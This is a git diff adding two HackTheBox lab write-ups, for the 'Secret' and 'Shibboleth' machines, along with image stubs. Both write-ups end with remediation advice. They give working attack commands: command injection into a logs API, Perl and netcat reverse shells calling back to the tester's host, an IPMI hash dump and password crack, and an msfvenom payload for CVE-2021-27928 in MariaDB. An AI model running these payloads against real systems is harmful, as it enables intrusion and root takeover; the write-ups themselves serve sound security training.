sha256:d14a0a1d66a61ea1faa19c28f2fd505c2d2b6b5645649d7aecd17471c55a2c46 +size 90636 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-3.png b/content/writeup-ctf/writeup-secret-htb/img/image-3.png new file mode 100644 index 0000000..b270b06 --- /dev/null 
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ecb659f888d7f04405b99d879d2129eb0823b6e24869a9d21ffad89fbc4f4ff +size 44195 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-3.webp b/content/writeup-ctf/writeup-secret-htb/img/image-3.webp new file mode 100644 index 0000000..c60181b --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb3a5cf87f96fdcd5970efeb89b4143f5015d4b6667ad8faf78356a903ab4daf +size 29508 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-4.png b/content/writeup-ctf/writeup-secret-htb/img/image-4.png new file mode 100644 index 0000000..441421a --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64d1cb86055a36c36d8173704896f0c10b0dfd4130a02ac0f875df9e4cd487da +size 57936 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-4.webp b/content/writeup-ctf/writeup-secret-htb/img/image-4.webp new file mode 100644 index 0000000..111fb8e --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41e73ca1bac685d2e7a1426ef7182b8bb0f193479d21b92c2abcd70c41672418 +size 42246 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-5.png b/content/writeup-ctf/writeup-secret-htb/img/image-5.png new file mode 100644 index 0000000..65c042e --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8147764dae8cbdb8f02ab7fbaeaa923f1a1a4b403c701840220e7278251c9eb1 +size 45985 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-5.webp b/content/writeup-ctf/writeup-secret-htb/img/image-5.webp new file mode 100644 index 0000000..3c4c904 --- /dev/null 
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3104e530458bcd3466f7efdbdee2c9f24b1bb4ba23e61450c4e32158c13d0ed +size 31148 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-6.png b/content/writeup-ctf/writeup-secret-htb/img/image-6.png new file mode 100644 index 0000000..a37b34b --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48066aaee4ada4758c03cfa174d140749dca25878b56c3a767b09ea339dcfcfb +size 13641 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-6.webp b/content/writeup-ctf/writeup-secret-htb/img/image-6.webp new file mode 100644 index 0000000..e89c4d7 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6cd5613cff5bd8bd0983182fb71e4da99cf52659c690ccab64e47b4e73da621f +size 8850 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-7.png b/content/writeup-ctf/writeup-secret-htb/img/image-7.png new file mode 100644 index 0000000..eb0b5a4 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0fc620150366ac3db6f506a74ffd012a915c5ab00d7d619f9e6bfebc67680a52 +size 44229 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-7.webp b/content/writeup-ctf/writeup-secret-htb/img/image-7.webp new file mode 100644 index 0000000..f356ac4 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:834c620884f50558f52028020481739f86745fca9ab835db5d6d2c3ad6b3e89a +size 30614 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-8.png b/content/writeup-ctf/writeup-secret-htb/img/image-8.png new file mode 100644 index 0000000..7d9d80e --- /dev/null 
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:514011beda714c604b573cdf23003e9abe8e4112e372991787624aa4d83de976 +size 70811 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-8.webp b/content/writeup-ctf/writeup-secret-htb/img/image-8.webp new file mode 100644 index 0000000..75832a8 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc7eab2fa7e11e7b2b69d1910f2140b51ba271f0110a7ffd86f102762df3862b +size 63426 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-9.png b/content/writeup-ctf/writeup-secret-htb/img/image-9.png new file mode 100644 index 0000000..6ac5d57 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7cabb82a9e17dabc60e83d1ec4f859943a60525759cebed60fc92cc9d7f4d74 +size 106604 diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-9.webp b/content/writeup-ctf/writeup-secret-htb/img/image-9.webp new file mode 100644 index 0000000..3a3d42a --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8858c4d144af986fbed989e7a581b1ff9da572689b637a78544635ce2e2c3af +size 85408 diff --git a/content/writeup-ctf/writeup-secret-htb/index.md b/content/writeup-ctf/writeup-secret-htb/index.md new file mode 100644 index 0000000..3cb7c92 --- /dev/null +++ b/content/writeup-ctf/writeup-secret-htb/index.md 
@@ -0,0 +1,183 @@ +--- +title: "Writeup - Secret (HTB)" +date: 2022-04-04 +slug: "writeup-secret-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Secret](https://app.hackthebox.com/machines/Secret) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.120 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : web server (Nginx 1.18.0) +- 3000/tcp : Node.js + +We have a site on port 80 and Node.js on port 3000: potentially an API. Let's go see with a browser what the site looks like and if we can find any information. + +![](img/image-2.webp) + +We can see several things: already there is an API with documentation, so potentially an attack vector. But we also have the source code of the site/API, which could be used to find vulnerabilities. + +## Exploit + +First, I will try to understand how the API works with the documentation. With the help of [Postman](https://www.postman.com/) software, I will create POST/GET requests to interact with the API. Let's create an account: + +![](img/image-3.webp) + +the API returns our user name which is normal, now let's try to connect to get our TOKEN and see how it is constituted: + +![](img/image-4.webp) + +The TOKEN is of type JWT, it is a token in 3 parts encoded in Base64 : + + +```bash +eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 : +{"alg":"HS256","typ":"JWT"} + +eyJfaWQiOiI2MjBlY2Y2Y2FiMjEyYzA0NjE1YjdmZDYiLCJuYW1lIjoiYXplcnR5IiwiZW1haWwiOiJhemVydHlAYXplcnR5LmNvbSIsImlhdCI6MTY0NTEzNzg2N30 : +{"_id":"620ecf6cab212c04615b7fd6","name":"azerty","email":"azerty@azerty.com","iat":1645137867} + + +oiM2eElnf05YPc9BSq9PiP8S8KCJh7lvhjo1x-sapIM +``` +Now let's try to access the priv page, to do this we need to send a request with a headers "auth-token" which has as value our TOKEN. + +![](img/image-5.webp) + +The API returns that we are a normal user. 
In the documentation we notice that the admin nickname is "theadmin", which is confirmed in the source code. The user with this nickname will have admin access. + +![](img/image-6.webp) + +The problem is that the account already exists and therefore the nickname is not available when creating a new account. + +![](img/image-7.webp) + +So we will have to find a way to send a request with the admin TOKEN to have access to the priv page and then send commands to the server. I have read about the json web token exploit on the following page: + +[Hacking JSON Web Tokens (JWTs)](https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a) + +I found out that if we have the admin TOKEN (which we have thanks to the documentation) and we have the TOKEN_SECRET which is used by the server. We can deduce the TOKEN without needing to know the admin password, perfect! + +After some analysis of the source code I discover that there are two hidden files: "*.git*" and "*.env*". And if I look in the "*.env*" file, I find the following content : + + +```bash +DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web' +TOKEN_SECRET = secret +``` +Bingo, the TOKEN_SECRET is in the file, it only remains to decrypt the tocken admin with this secret on the site [JWT](https://jwt.io/) : + +![](img/image-8.webp) + +And we get the admin TOKEN, unfortunately after sending the request, the TOKEN is not recognized, there must be another TOKEN_SECRET somewhere. + +I quickly realize that there are two commits on the .env file, in the first commit there is another TOKEN : + +![](img/image-9.webp) + + +```bash +eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjI4NzI3NjY5fQ.52W5mGLsIO2iiLpy3f1VkVavP4hOoWHxy5_0BDn9UKo +``` +I test this new TOKEN and make a request: + +![](img/image-10.webp) + +It works, I now have admin access to the API. Now let's analyze the logs page to find a exploit. 
+ +![](img/image-11.webp) + +I realize that the page check if I am admin, then run the command "git". So if in the variable "file" I add a command after a filename, I can execute any command, for example : + + +```bash +GET http://10.10.11.120/api/logs?file=;ls /home +"80bf34c fixed typos 🎉\n0c75212 now we can view logs from server 😃\nab3e953 Added the codes\ndasith\n" +``` +After the return of the log command, the result of the "ls /home" command is here : dasith. + +Now I will try to create a reverse shell to do the privilege elevation. After opening the 1234 on my machine with the "nc" command, I use the following request to initiate the connection: + + +```bash +http://10.10.11.120/api/logs?file=;perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.14.246:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +I do a shell upgrade with the following command: + + +```bash +python3 -c 'import pty;pty.spawn("/bin/bash")' +``` +I now have a clean shell with the user dasith ! + +![](img/image-12.webp) + +Then I can get the first flag ! + + +```bash +dasith@secret:~/local-web$ cat /home/dasith/user.txt +d2afcc21f60e10127abdf051998281af +``` +## Privilege escalation + +At first I use the [linPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script, but without much success. After testing several exploits (CVE-2021-4034, Reusing Sudo Tokens, Credentials from Process Memory, ...), I resign myself to go look somewhere else. I notice that in the "/opt" folder, there is a program that I can run with root rights : "count". + +![](img/image-13.webp) + +After running it to understand how it works, I understand that the program takes a file as input and gives in return the number of characters, words, lines. It is globally equivalent to the "wc" command, but it offers the possibility to save the result in a file. 
After having done an analysis of the code with "gdb" without much success, I put myself in search of a solution to recover the data that program use during its execution. + +I notice that there is a second file: code.c. Potentially the source code of "count". In this file nothing special except the following line: + + +```bash +// Enable coredump generation +prctl(PR_SET_DUMPABLE, 1); +``` +After some research, this command activates the generation of log following a core dump. This log contains among other things the contents of the memory during the crash, it would be possible to recover the contents of the file being read by the program. So let's try to make a core dump during the execution of the program and analyze the logs ! + +![](img/image-14.webp) + +So I launch the program, then pause it with "CTRL+Z". I then look for the process number and generate a crash with "kill -BUS". Then i resume the execution with "fg", the program makes a Core Dump. Normally a log has been generated in "/var/log", I extract the log with "apport-unpack". And then I extract words with the command "strings": + + +```bash +apport-unpack /var/crash/_opt_count.1000.crash /tmp/log +strings /tmp/log/CoreDump +``` +![](img/image-15.webp) + +I find in the output of the command the private key of the root account ! 
I now can use it to connect with ssh and get the root flag of the machine: + + +```bash +chmod 600 id.root +ssh -i id.root root@10.10.11.120 +``` + +```bash +root@secret:~# cat root.txt +f1fd65e03617bbf10967424cffe1cc3c +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Don't include real TOKEN in the documentation +- Take care of removing every secret or sensitive information in the source code before publish it +- Do not hard code the API admin name +- Secure the API to prevent commands from being executed on the host +- Disable logs following a core dump or at least do not allow access to a non-root user +- Do not leave the source code of a program accessible to everyone diff --git a/content/writeup-ctf/writeup-shibboleth-htb/featured.png b/content/writeup-ctf/writeup-shibboleth-htb/featured.png new file mode 100644 index 0000000..6858013 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fa622492a98f56a836ce8136b95ee3b3ee8563613f509672439741166204eb9 +size 234376 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/featured.webp b/content/writeup-ctf/writeup-shibboleth-htb/featured.webp new file mode 100644 index 0000000..562e584 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7a333ae3251f006a7102f73111e867cf6fb8a452a35fb93a8e9991635449070 +size 27828 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.png new file mode 100644 index 0000000..0f711b0 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2bd442bc5f2da8683669a9d26ebd151534bbb56ab0937f53c59ebc711ca861ad +size 36322 
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.webp new file mode 100644 index 0000000..cc3058d --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51453c097ddb3b25c0ca04f6506544954220f74abe02a24adb36600f62e461d1 +size 28096 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.png new file mode 100644 index 0000000..d9b6bdb --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8abcecd00908e7b8983541f814e9acbbab6cd98d28605f25f16bddd13d0e2ed2 +size 13561 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.webp new file mode 100644 index 0000000..b7db597 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:142a98029246ac8f7946da3894aaca93bd62bcf280d43977392f7982cf570525 +size 12920 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.png new file mode 100644 index 0000000..855f685 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bcc49e6cb4eecf23ba7b3ebee7762c443f49ef43e0ce3c3468af4b529628c885 +size 28447 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.webp new file mode 100644 index 0000000..07ece0b --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:acd9859ba97cb2e039fb9328e0d61688385dde789d519db5753a2f768780b360 +size 31776 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.png new file mode 100644 index 0000000..3d0d93b --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce6d23cc8da70d08761a35b1fdf07ccb83a47727c15db3851ff48405d1f8f9f3 +size 22730 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.webp new file mode 100644 index 0000000..616f556 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:295f616c443c059dbb9061247006000de32a1cddf2de30a781ad730e5851d7d8 +size 25324 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.png new file mode 100644 index 0000000..615433c --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32ca7d3a7fec5a6e54bc89c4998a397421f05db6fdefd3b6d21cbfa3bc35a148 +size 16149 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.webp new file mode 100644 index 0000000..0414583 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76f23a6fcb302611b2170e7a7ff5a3495c37a00bc0457ec75e3585bc287ac367 +size 16206 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.png new file mode 100644 index 0000000..128121a --- /dev/null 
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:faa0d7e8839334047a52dd917e370fae3dcd49b88b5df91ba086378d85c3c42f +size 185834 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.webp new file mode 100644 index 0000000..33cd622 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dce79195933309b326a5127171374f7fcfaa8dedba4d02c2993af335098e4511 +size 65634 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.png new file mode 100644 index 0000000..fc1baa5 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da6ed97767feafd78ac9b861220002e09693c8e266387d18b474b9603ba5b9e5 +size 74079 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.webp new file mode 100644 index 0000000..0f86a4e --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62ecb722567809fbc6d456db565c41f8df892092661480d1d788c5361b35c927 +size 50800 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.png new file mode 100644 index 0000000..0ea654f --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1910db54678d77340c5f6b58f055eab2835555c774dabda281be6f3e5430dfdd +size 64366 
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.webp new file mode 100644 index 0000000..3729a0a --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb4612974f8eba8db43de209541d2aa643ca04cb14ffed697fc4fc3ac7e1e94c +size 41538 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.png new file mode 100644 index 0000000..b0fb831 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a80d4e2fa41c171db5dbb77a26d18f5ff5fe8becd60155bdec3f7e620cffea7a +size 12570 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.webp new file mode 100644 index 0000000..c1cd95d --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4b6d49f53f6eaa43512e7be35d8118a27e7591fa7b201adc1004a6b722bb164 +size 7812 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.png new file mode 100644 index 0000000..e69cd3d --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6433341d966966362751b3093e6fce254d1b94698e691ea476520100fdb64b1 +size 44497 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.webp new file mode 100644 index 0000000..41c0d4f --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0377b4203fef0a20016440516b2b87e99afce157364e69afee3ae13247c2d3b6 +size 28530 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.png new file mode 100644 index 0000000..1a49427 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5666be746d3455991ca45b591bd81a911d9cc45f779b9833e543d278215bb1cd +size 37258 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.webp new file mode 100644 index 0000000..5e5909e --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4dfadbaa7fd00d6b4e0bf67d92dbe96869208043043e55a91cb17e7703f09fb5 +size 30834 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.png new file mode 100644 index 0000000..719a79d --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:560ab74931d59f44b167e086a8f30411c4888d1bf1a871a686f2c89439cadb79 +size 112627 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.webp new file mode 100644 index 0000000..75d1d52 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:81f503ecc644eec71ff93e3e659bfdf22ffe9abbf304c59bc67f11db23b811d8 +size 50178 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.png new file mode 100644 index 0000000..f854f0f --- /dev/null 
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c26f045c84dd5b2d514b16f4222107d8d2e015ca88ee4608c4ffe1dd2b94851c +size 21375 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.webp new file mode 100644 index 0000000..182c30b --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb13953646c0d4f640915eb415e4207cf661ffce819279468cea795d31f1c54b +size 13056 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/index.md b/content/writeup-ctf/writeup-shibboleth-htb/index.md new file mode 100644 index 0000000..74ea50b --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/index.md 
@@ -0,0 +1,169 @@ +--- +title: "Writeup - Shibboleth (HTB)" +date: 2022-04-02 +slug: "writeup-shibboleth-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Shibboleth](https://app.hackthebox.com/machines/Shibboleth) machine on the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.124 +``` +One TCP ports are discovered: + +![](img/image-1.webp) + +- 80/tcp : HTTP web server (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +At first I start by making a scan of the pages of the site: + +![](img/image-3.webp) + +Then I make a scan of the subdomain: + +![](img/image-4.webp) + +I find 3 different subdomains, I add them to the `/etc/hosts`. Then I access the site `zabbix.shibboleth.htb` and I arrive on an authentication page! + +![](img/image-5.webp) + +After some research, I can't find anything in particular. So I try to do a UDP scan to see if any additional ports are open. For that I use the following command: + + +```bash +sudo nmap -sU --min-rate 5000 shibboleth.htb +``` +![](img/image-6.webp) + +The port 623/udp is open, after some research on google I find this port is used for IPMI (Intelligent Platform Management Interface). I quickly find an exploit related to this port: + +[623/UDP/TCP - IPMI - HackTricks](https://book.hacktricks.xyz/pentesting/623-udp-ipmi) + +So I launch Metasploit and I set the extension with the following commands: + + +```bash +use auxiliary/scanner/ipmi/ipmi_dumphashes +set RHOSTS shibboleth.htb +set OUTPUT_JOHN_FILE hash +``` +After a few seconds, it returns the hash of an `Administrateur` user! 
+ + +```bash +[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:156faf2282010000498ef9d2af7763ced04cc2a26058817d46f358e7f7f1991b35fd4a73def2e04ea123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:6b18bd2fb3309ee821c2ade2e1bcc9f2a8c75519 +``` +I try to crack it with john using the following command: + + +```bash +john hash --wordlist=rockyou.txt +``` +![](img/image-7.webp) + +John finds the following password: `ilovepumkinpie1`. + +I then credit them on the previous authentication page and it works. + +![](img/image-8.webp) + +After some research I find that it is possible to execute commands by creating an item via the administration panel. For that I go on the following page: + +Configuration -> Hosts -> Item -> Create Item + +I give a name to the item then I return the following key value: + + +```bash +name: shell +key : system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.103 1234 >/tmp/f,nowait] +``` +I can now test the item with the `Get value and test` button. + +![](img/image-9.webp) + +I now have a reverse shell with the user `zabbix`. + +![](img/image-10.webp) + +I start by upgrading my shell with the following command: + + +```bash +python3 -c 'import pty; pty.spawn("/bin/bash")' +``` +Then I realize that the first flag is held by the user `ipmi-svc`. This is the same name as the port I exploited above, so I try to change the user with the same password: + + +```bash +zabbix@shibboleth:/home/ipmi-svc$ su ipmi-svc +su ipmi-svc +Password: ilovepumkinpie1 + +ipmi-svc@shibboleth:~$ cat user.txt +cat user.txt +70c2f49504f02ded92ccbef9b3c95b35 +``` +I now have access to the first flag. + +## Privilege escalation + +I start by uploading the [linPeas.sh](https://linpeas.sh) script then I run it. 
I notice 2 things in the result: + +- The mysql service is run by the root user +- I have access to a file with a username and password to access the database + +![](img/image-11.webp) + +So I try to connect to the database with the following command: + + +```bash +mysql -h 127.0.0.1 -u zabbix -p +``` +![](img/image-12.webp) + +The credentials work well and allow me to discover the version of the mysql database: MariaDB 10.3.25. + +After some research I find that this version is sensitive to [CVE-2021-27928](https://github.com/Al1ex/CVE-2021-27928). This CVE allows to create a reverse shell root ! + +So I start by creating a payload with the following command: + + +```bash +msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.103 LPORT=2345 -f elf-so -o exploit.so +``` +Then after uploading it to the target machine, I set the global variable wsrep\_provider with this same payload: + + +```bash +mysql -h 127.0.0.1 -u zabbix -p -e 'SET GLOBAL wsrep_provider="/tmp/exploit.so";' +``` +![](img/image-13.webp) + +I now have a reverse shell as `root` and I can get the last flag. + + +```bash +root@shibboleth:/var/lib/mysql# cat /root/root.txt +cat /root/root.txt +6e4f289fbcc6803513ffe5a5dae46b85 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update IPMI to avoid dumps of user hashes +- Do not use the same password across multiple services +- Do not run MariaDB as root +- Update MariaDB to avoid the reverse shell exploit diff --git a/content/writeup-ctf/writeup-shocker-htb/featured.png b/content/writeup-ctf/writeup-shocker-htb/featured.png new file mode 100644 index 0000000..6fb6a20 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7bf1855209bcea6dbe3030f2ba62bd001667bf2056e6596689cb9918b761cb9 +size 384694 
